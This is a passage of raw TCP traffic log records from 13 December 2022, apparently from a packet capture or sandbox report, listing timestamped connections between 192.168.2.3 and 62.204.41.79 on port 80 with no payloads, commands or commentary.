                                              Dec 13, 2022 20:09:18.505341053 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.505498886 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.505645037 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.505798101 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.505922079 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.506087065 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.506241083 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.506400108 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.506548882 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.506714106 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.506860971 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.507028103 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.515748978 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.515774012 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.515790939 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.516388893 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.516536951 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.516557932 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.516763926 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.516782045 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.516810894 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.517138004 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.517261028 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.517350912 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.517441034 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.517525911 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.517591953 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.517611980 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.517633915 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.517646074 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.517664909 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.517752886 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.517765045 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.517782927 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.517800093 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.517817020 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.517833948 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.517889977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.517980099 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.518102884 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.518197060 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.518290997 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.518381119 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.518484116 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.518575907 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.518706083 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.518821001 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.518973112 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.519032955 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.519121885 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.519227028 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.519355059 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.519476891 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.519588947 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.519666910 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.520189047 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.520253897 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.520281076 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.520334005 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.520456076 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.520531893 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.520654917 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.520767927 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.521105051 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.521173954 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.521204948 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.521296024 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.521373987 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.521408081 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.521508932 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.521564960 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.521662951 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.521752119 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.521857023 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.521882057 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.522021055 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.522037983 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.522209883 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.522397041 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.522406101 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.522552967 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.522569895 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.522629023 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.522738934 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.522770882 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.528295040 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.528397083 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.528528929 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.533456087 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.533669949 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.533816099 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.533952951 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.534076929 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.534210920 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.534372091 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.534504890 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.534641981 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.534759998 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.534905910 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.535135984 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.535320997 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.535509109 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.535698891 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.535850048 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.535974026 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.536108971 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.536230087 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.536432981 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.536550999 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.536686897 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.536955118 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.537223101 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.537358999 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.537482023 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.537614107 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.537739038 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.537944078 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.538089991 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.538309097 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.551718950 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.551912069 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.552006006 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.552118063 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.552848101 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.553026915 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.553148985 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.553237915 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.553350925 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.553603888 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.553793907 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.553893089 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.553992033 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.556871891 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.557776928 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.557851076 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.558401108 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.558434963 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.558489084 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.561943054 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.562112093 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.562249899 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.564049959 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.564124107 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.565198898 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.565376997 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.565495014 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.565491915 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.565562963 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.565701962 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.565829039 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.565874100 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.566093922 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.566153049 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.566282988 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.566399097 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.566570997 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.566689968 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.566915989 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.566946983 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.566948891 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.567147017 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.567167997 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.567275047 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.567444086 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.567522049 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.567775965 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.567873001 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.567975998 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.568154097 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.577861071 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.577896118 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.577923059 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.577950954 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.578053951 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.578284979 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.578313112 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.578485966 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.578596115 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.578622103 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.578792095 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.578819036 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.578967094 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.578994036 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.579205990 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.579370975 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.579524040 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.579555035 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.579582930 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.579683065 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.579801083 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.579971075 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.580040932 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.580245972 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.594175100 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.594300985 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.594363928 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.594450951 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.594832897 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.594922066 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.595062971 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.595096111 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.595166922 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.595323086 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.595617056 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.595788002 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.595820904 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.596103907 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.596223116 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.596419096 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.596662998 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.596694946 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.596770048 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.597059965 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.597137928 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.597259045 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.597563982 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.597901106 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.598058939 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.598134995 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.598256111 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.598536968 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.598655939 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.598831892 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.613512993 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.613903999 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.614397049 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.614450932 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.615278006 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.615576982 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.615607023 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.623007059 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.623168945 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.623343945 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.623496056 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.623663902 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.623809099 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.623970032 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.624120951 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.624285936 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.624430895 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.624589920 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.624741077 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.624897957 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.625052929 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.625205040 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.625358105 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.625510931 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.625658989 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.625906944 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.626128912 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.626250982 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.626346111 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.626383066 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.626563072 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.626719952 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.626873016 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.627027035 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.627170086 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.627237082 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.627329111 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.627509117 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.627654076 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.627680063 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.627815008 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.627983093 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.628128052 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.628223896 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.628287077 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.628454924 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.628602028 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.628766060 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.628911972 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.629070044 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.629216909 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.629216909 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.629254103 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.629290104 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.629403114 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.629566908 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.629714966 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.629872084 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.630019903 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.630176067 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.630322933 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.630479097 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.630634069 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.630707026 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.630896091 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.631156921 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.631356955 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.631520987 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.631653070 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.683904886 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.683933973 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.683952093 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.684030056 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.684112072 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.684315920 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.684727907 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.684753895 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.684772015 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.685312033 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.685342073 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.685364962 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.685442924 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.685544014 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.685698986 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.685827971 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.686049938 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.686182022 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.686410904 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.686639071 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.686965942 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.687032938 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.687200069 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.687397957 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.687513113 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.687716961 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.687835932 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.688047886 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.688178062 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.688270092 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.688519955 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.688633919 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.688839912 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.688922882 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.689071894 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.689280033 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.689398050 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.689512014 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.689837933 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.689954996 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.690073013 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.690190077 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.690351963 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.690510988 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.690675020 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.690964937 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.691111088 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.691189051 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.691356897 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.691687107 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.692034006 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.692054033 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.692327023 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:19.186649084 CET4974980192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:19.190092087 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:19.190331936 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:19.190577030 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:19.190994024 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:19.191206932 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:19.191474915 CET4975080192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:19.191531897 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:19.191639900 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:19.191720963 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:19.191901922 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:19.192018032 CET4973680192.168.2.362.204.41.79
